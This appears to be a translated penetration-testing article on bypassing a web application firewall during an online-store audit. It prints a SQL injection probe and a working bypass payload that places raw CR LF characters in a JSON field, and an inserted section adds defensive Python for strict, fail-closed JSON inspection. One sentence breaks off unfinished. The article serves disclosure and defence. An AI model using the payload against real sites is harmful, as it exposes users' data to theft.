Let us turn to a real case from our practice: an audit of an online store whose site was protected by PT AF. Because of the WAF it was hard to find any vulnerability, and therefore any bypass; nevertheless, non-standard behaviour was found in a part of the web application that the WAF did not filter. The anomaly was found in the search function of the purchased-items history, and it consisted of the following. The request was sent in JSON format and looked like this:
{"request":{"Count":10,"Offset":0,"ItemName":"Phone"}}
When the values Phone' and Phone'+' were substituted into the ItemName parameter, the server returned different responses in these two cases: the response to the request with Phone' was empty, while the response to the request with Phone'+' contained the data of every product with the word Phone in its name, as if the value of the ItemName parameter were simply Phone. This behaviour is well known to many hackers and pentesters and clearly indicates a problem with the filtering of user input in the web application, which leads to SQL injection.
Let us explain why this happens, using the SQL injection example. The point is that when such behaviour is found in a web application, in most cases the data for the SQL query is simply concatenated with the query itself, and in the first case passing the parameter Phone' produces the SQL query
SELECT item FROM items WHERE item_name='Phone''
Such a query obviously does not execute and returns no result, because its syntax is incorrect. The second request, with the parameter Phone'+', produces the query
SELECT item FROM items WHERE item_name='Phone'+''
which has correct syntax and selects the products named Phone.
This way of detecting the vulnerability has a big advantage when testing web applications protected by a WAF: in most modern WAFs a single quote character is not considered a sufficient anomaly in a parameter, and a request containing it is let through.
The detection had been found; now we had to find a way to bypass the WAF and exploit the vulnerability. After going through several bypasses, a problem was found in the WAF under investigation: it turned out to be vulnerable to special characters added to a JSON parameter. Essentially, if the \r\n characters were placed into a JSON text field in raw, unencoded form, the WAF simply let the request through, while the web application considered the data correct and processed it. Apparently the problem was in the JSON parser, which had not been designed for special characters to appear exactly where they did. As a result, the WAF analyser did not receive the complete request, and a special attack vector could be inserted after the special characters. Besides the line feed, other special characters such as the null byte also worked. In the end we were able to build the following query, which the WAF would have caught had it checked the whole request (the line feed and carriage return characters are replaced here with their text representation):
{"request":{"kill-waf":"die\r\n", "Count":10,"Offset":0,"ItemName":["'+(SELECT 'Phone'+CHAR(ASCII(substring(@@version,1,1))-24))+'"]}}
As a result, all the parameters could be tested quickly and conveniently for the presence of vulnerabilities (and several more were found in other queries). Bypassing the WAF and exploiting this injection led to a complete compromise of all users of the web application.
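As an added example (written for this edit, not code from the original article or the WAF discussed), the block below shows the parser behaviour at the heart of this case: a strict JSON parser refuses raw control characters inside strings, so an inspector that fails closed on a parse error cannot be made to lose the rest of the document. The request bodies are constructed to resemble the shape above (with the SQL fragment shortened) and are not the audited application's data; the helper names are assumptions of the example.

```python
import json

# Constructed bodies modelled on the request shape discussed above.  The first
# carries a raw CR LF inside a string value (spelled as Python escapes here);
# the second is the same payload with the control characters escaped as a
# conforming JSON producer would emit them; the third is the ordinary request.
RAW_CONTROL = ('{"request":{"kill-waf":"die\r\n", "Count":10,"Offset":0,'
               '"ItemName":["\'+(SELECT \'Phone\'+CHAR(1))+\'"]}}')
ESCAPED = ('{"request":{"kill-waf":"die\\r\\n", "Count":10,"Offset":0,'
           '"ItemName":["\'+(SELECT \'Phone\'+CHAR(1))+\'"]}}')
CLEAN = '{"request":{"Count":10,"Offset":0,"ItemName":"Phone"}}'


def flatten(obj, path="", out=None):
    """Collect every scalar in the document as (json-path, value) so that each
    one is handed to the inspection rules and nothing is silently dropped."""
    if out is None:
        out = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            flatten(v, f"{path}.{k}", out)
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            flatten(v, f"{path}[{i}]", out)
    else:
        out.append((path.lstrip("."), obj))
    return out


def inspect_json_body(raw):
    """Fail closed: a body the strict parser refuses is 'reject', never
    'nothing to inspect'.  json.loads(strict=True) is the default and
    refuses unescaped control characters inside strings."""
    try:
        doc = json.loads(raw, strict=True)
    except json.JSONDecodeError as exc:
        return "reject", f"malformed JSON: {exc.msg}"
    return "inspect", flatten(doc)


def lenient_view(raw):
    """What a parser that tolerates raw control characters sees: the same
    document with the CR LF kept inside the string.  Shown only to make the
    difference visible; an inspector must not run in this mode."""
    return flatten(json.loads(raw, strict=False))


if __name__ == "__main__":
    for label, body in [("raw_control", RAW_CONTROL), ("escaped", ESCAPED), ("clean", CLEAN)]:
        print(label, inspect_json_body(body))
```

Note the second effect the strict parse gives for free: once a body is parsed as a document, `flatten` delivers the list element in `ItemName` to the rules as a value in its own right, rather than as whatever text happened to follow the control characters.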
A similar problem was found in Nemesida WAF. The only difference was that the request was not in JSON format but a regular POST request with parameters, and the web application's parameter was substituted into the SQL query as a number. Unfortunately, the developers of Nemesida WAF have for now asked us not to publish the technical details, so we cannot disclose them at the moment; we will publish them later. The problem was reported to Pentestit and has been fixed.
As you can see, even a very modern and very intelligent WAF can unfortunately sometimes be bypassed by inserting a single special character. The problem here is that at present it is impossible to build into a WAF every option for every possible input of every possible server, and the machine learning that a WAF needs, once the parser stumbles and overlooks some special characters, evidently
Conclusion

Unfortunately, not all developers understand this, and for some reason regard a WAF as a silver bullet against hackers. For example, in one of our audits we found a way to bypass the WAF, which let us exploit vulnerabilities. As we learned after the audit, the developers had already had the web application audited while it was not yet protected by a WAF, and the same vulnerabilities had already been found in that earlier audit. But instead of closing them, they decided to buy a modern WAF with machine learning and rely on it completely. It is a pity that the WAF vendor did not insist that the web application developers fix the known vulnerabilities; or perhaps the developers themselves decided that a WAF was better than fixing the bugs in their code. We do not know these details, but in any case this is a very bad practice, both on the part of WAF vendors and on the part of developers.
Note also that machine learning in WAFs remains a black box and is perceived more as a marketing move than as a genuinely effective protection method.
Overall, web application firewalls are a good modern security tool, and a WAF is never superfluous for a web application. But at the moment it must be remembered that a WAF only complicates the search for vulnerabilities and their exploitation; it does not eliminate the vulnerabilities completely, and this situation will evidently persist for a long time. A web application can be rid of vulnerabilities only by fixing the code that causes them; otherwise nothing and nobody will protect you.
The material on WAF bypasses was collected by:
Bulatov Ilya (barracud4)
Rybin Denis (thefaeriedragon)
Romanov Alexander (web_rock)